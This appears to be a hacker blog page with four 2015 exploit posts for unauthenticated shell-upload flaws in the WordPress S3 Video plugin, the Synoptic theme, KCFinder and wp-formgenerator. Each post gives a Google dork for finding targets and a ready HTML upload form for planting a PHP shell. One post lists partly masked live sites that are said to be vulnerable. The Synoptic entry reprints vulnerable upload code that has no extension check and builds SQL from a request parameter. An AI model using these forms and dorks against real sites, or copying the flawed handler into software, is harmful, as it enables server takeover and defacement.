Tampilkan postingan dengan label CSRF. Tampilkan semua postingan
Tampilkan postingan dengan label CSRF. Tampilkan semua postingan

Jumat, 11 Desember 2015

WordPress Plugins S3 Video Remote Shell Upload


#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 
/wp-content/plugins/s3-video/includes/uploadify.php

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:
Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>

Shell Path : Here !!


Diposting oleh di Tidak ada komentar:
Label: , , ,

Minggu, 08 November 2015

Wordpress Themes Synoptic Shell Upload Vulnerabilities



#- Title: Wordpress Themes Synoptic Shell Upload Vulnerabilities
#- Author: uknown
#- Date: 11/08/2015
#- Developer : RecarnTheme
#- Vendor : themeforest
#- Link Download : themeforest. net/item/synoptic-premium-wordpress-template/234600
#- Google Dork: inurl:wp-content/themes/synoptic/
#- Tested on : Windows 7
#- Fixed in ??
=====================================================

&- Vulnerability : /public_html/wp-content/themes/synoptic/lib/avatarupload /upload.php



bug code :
<?php
//include required wp-load.php file for access WP functions
$wp_load_include = "../wp-load.php";
$i = 0;
while (!file_exists($wp_load_include) && $i++ < 9) {
 $wp_load_include = "../$wp_load_include";
}
//required to include wordpress file
require($wp_load_include);


/**
 * Handle file uploads via XMLHttpRequest
 */
class qqUploadedFileXhr {
    /**
     * Save the file to the specified path
     * @return boolean TRUE on success
     */
    function save($path) {    
        $input = fopen("php://input", "r");
        $temp = tmpfile();
        $realSize = stream_copy_to_stream($input, $temp);
        fclose($input);
        
        if ($realSize != $this->getSize()){            
            return false;
        }
        
        $target = fopen($path, "w");        
        fseek($temp, 0, SEEK_SET);
        stream_copy_to_stream($temp, $target);
        fclose($target);
        
        return true;
    }
    function getName() {
        return $_GET['qqfile'];
    }
    function getSize() {
        if (isset($_SERVER["CONTENT_LENGTH"])){
            return (int)$_SERVER["CONTENT_LENGTH"];            
        } else {
            throw new Exception('Getting content length is not supported.');
        }      
    }   
}

/**
 * Handle file uploads via regular form post (uses the $_FILES array)
 */
class qqUploadedFileForm {  
    /**
     * Save the file to the specified path
     * @return boolean TRUE on success
     */
    function save($path) {
        if(!move_uploaded_file($_FILES['qqfile']['tmp_name'], $path)){
            return false;
        }
        return true;
    }
    function getName() {
        return $_FILES['qqfile']['name'];
    }
    function getSize() {
        return $_FILES['qqfile']['size'];
    }
}

class qqFileUploader {
    private $allowedExtensions = array();
    private $sizeLimit = 10485760;
    private $file;

    function __construct(array $allowedExtensions = array(), $sizeLimit = 10485760){        
        $allowedExtensions = array_map("strtolower", $allowedExtensions);
            
        $this->allowedExtensions = $allowedExtensions;        
        $this->sizeLimit = $sizeLimit;
        
        $this->checkServerSettings();       

        if (isset($_GET['qqfile'])) {
            $this->file = new qqUploadedFileXhr();
        } elseif (isset($_FILES['qqfile'])) {
            $this->file = new qqUploadedFileForm();
        } else {
            $this->file = false; 
        }
    }
    
    private function checkServerSettings(){        
        $postSize = $this->toBytes(ini_get('post_max_size'));
        $uploadSize = $this->toBytes(ini_get('upload_max_filesize'));        
        
        if ($postSize < $this->sizeLimit || $uploadSize < $this->sizeLimit){
            $size = max(1, $this->sizeLimit / 1024 / 1024) . 'M';             
            //die("{'error':'increase post_max_size and upload_max_filesize to $size'}");    
        }        
    }
    
    private function toBytes($str){
        $val = trim($str);
        $last = strtolower($str[strlen($str)-1]);
        switch($last) {
            case 'g': $val *= 1024;
            case 'm': $val *= 1024;
            case 'k': $val *= 1024;        
        }
        return $val;
    }
    
    /**
     * Returns array('success'=>true) or array('error'=>'error message')
     */
    function handleUpload($uploadDirectory, $replaceOldFile = TRUE){
        if (!is_writable($uploadDirectory)){
            return array('error' => "Server error. Upload directory isn't writable.");
        }
        
        if (!$this->file){
            return array('error' => 'No files were uploaded.');
        }
        
        $size = $this->file->getSize();
        
        if ($size == 0) {
            return array('error' => 'File is empty');
        }
        
        if ($size > $this->sizeLimit) {
            return array('error' => 'File is too large');
        }
        
        $pathinfo = pathinfo($this->file->getName());
        //$filename = $pathinfo['filename'];
  $filename = $this->file->getName();//$pathinfo['filename'];
        //$filename = md5(uniqid());
        $ext = $pathinfo['extension'];

        if($this->allowedExtensions && !in_array(strtolower($ext), $this->allowedExtensions)){
            $these = implode(', ', $this->allowedExtensions);
            return array('error' => 'File has an invalid extension, it should be one of '. $these . '.');
        }
        
        if(!$replaceOldFile){
            /// don't overwrite previous files that were uploaded
            while (file_exists($uploadDirectory . $filename . '.' . $ext)) {
                $filename .= '_1';//rand(10, 99);
            }
        }
        
        //if ($this->file->save($uploadDirectory . $filename . '.' . $ext)){
  if ($this->file->save($uploadDirectory . $filename)){  
   global $wpdb;
   $table_name = $wpdb->prefix.'syn_users';
   /*$syn_posts_query = "UPDATE ".$table_name." SET market_file_name='".$filename . '.' . $ext."' 
              WHERE ID = ".$_GET['user_id']." AND post_status='publish';"; // update user profile info*/
              
   //$syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename.".".$ext."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
   $syn_avatar_query = "UPDATE ".$table_name." SET user_avatar = '".$filename."' WHERE ID = ".$_GET['user_id'].";"; // update user profile avatar
   //$wpdb->show_errors();
   $wpdb->query($syn_avatar_query);
  
            //return array('success'=>true);
        } else {
            return array('error'=> 'Could not save uploaded file.' .
                'The upload was cancelled, or server error encountered');
        }
        
    }    
}

// list of valid extensions, ex. array("jpeg", "xml", "bmp")
$allowedExtensions = array();
// max file size in bytes
$sizeLimit = 1 * 528 * 528; // is equal with 278KB

$uploader = new qqFileUploader($allowedExtensions, $sizeLimit);

//put permission to upload file
$stat = @stat( dirname( AVATAR_UPLOAD_FOLDER ) );
$dir_perms = $stat['mode'] & 0007777;  // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );

$result = $uploader->handleUpload(AVATAR_UPLOAD_FOLDER);

//put permission to not read folder from outside
$dir_perms = $stat['mode'] & 0005555;  // Get the permission bits.
@chmod( AVATAR_UPLOAD_FOLDER, $dir_perms );

// to pass data through iframe you will need to encode all html tags
echo htmlspecialchars(json_encode($result), ENT_NOQUOTES);

?>

&- When Vulnerable : {"error":"No files were uploaded."}

Proof Of Concept :

Material : sh3ll.php

Code:
<form enctype="multipart/form-data"
action="url.com/wp-content/themes/synoptic/lib/avatarupload/upload.php" method="post">
Your File: <input name="qqfile" type="file" /><br />
<input type="submit" value="3xploi7ed !" />
</form>

Shell Path : Here

Diposting oleh di Tidak ada komentar:
Label: , ,

Sabtu, 31 Oktober 2015

KCFinder Upload Shell Vulnerability



#-  Exploit Title : KCFinder Upload Shell Vulnerability
#- Exploit Author : Iranian_Dark_Coders_Team
#- Google Dork : inurl:/kcfinder/browse.php
#- Date : 24/04/2014
#- Home : www.idc-team. net
#- Discovered By : Black.Hack3r
#- Vendor Homepage : kcfinder.sunhater. com
#- Version : 2.51 - 2.53
#- Tested on : Windows 8 & Linux

=================================================

 [+] Events location bug:

 [+] http://127.0.0.1/path/kcfinder/config.php

  Line 51: 'deniedExts' => "exe com msi bat php phps phtml php3 php4 cgi pl",



 [+] Exploit:
 
 [+] http://127.0.0.1/kcfinder/browse.php
 [+] http://127.0.0.1/[path]/kcfinder/browse.php



 [+] Proof Of Cencept

Trick 1 ~~
 
1 > Go to target link
    http://localhost/KCFinder/browse.php

2 > Then select your folder from the left panel

3 > Upload your shell as [ shell.php2 & shell.php5 & shell.php.black & shell.shtml & defacepage.html ]

4 > Shell Acces ?
      {here}
       

Trick 2 ~~

Where is vulnerability ? "localhost/path/kcfinder/upload.php"

How to ??  You can use CSRF :) 

<form method="POST" action="http://web. com/path/kcfinder/upload.php"
enctype="multipart/form-data">
<input type="file" name="Filedata" /><button>~/ ndsxf</button>
</form> 

Shell Acces ? {here}

 [+] Demo site:

 [+] http://www.basukiwat**.com/assets/js/mylibs/kcfinder/browse.php
 [+] http://www.padel4**.be/kcfinder/browse.php
 [+] http://goyathlaysvintagepavonirestoratio**.com/kcfinder/browse.php



 [+] Discovered By : Black.Hack3r
 [+] We Are : M.R.S.CO,Black.Hack3r,N3O,D$@d_M@n,KurD_HaCK3R,HOt0N
 [+] SpTnx  : Sec4ever,HashoR,@3is,Security,M4H4N,Mr.Cicili And All IDC Member
 [+] Home : www.idc-team. net




Diposting oleh di Tidak ada komentar:
Label: , , ,

Senin, 26 Oktober 2015

Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities




#-Title: Wordpress Plugins Wp-formgenerator File Upload Vulnerabilities
#-Author: unknown
#-Date: 10/26/2015
#- Vendor : CodeCanyon
#- Link Download : codecanyon. net/item/form-generator-wordpress-form-builder/4613911
#-Google Dork: inurl:wp-content/plugins/wp-formgenerator
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================

Vulnerability : "/wp-content/plugins/wp-formgenerator/uploads/php"
 When Vulnerable {"files":[]}

Proof Of Concept :

Use CSRF :

<form method="POST" action="Zembut/wp-content/plugins/wp-formgenerator/uploads/php/"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>

</form>


Shell Acces ? Here





Diposting oleh di Tidak ada komentar:
Label: , ,
Langganan: Postingan (Atom)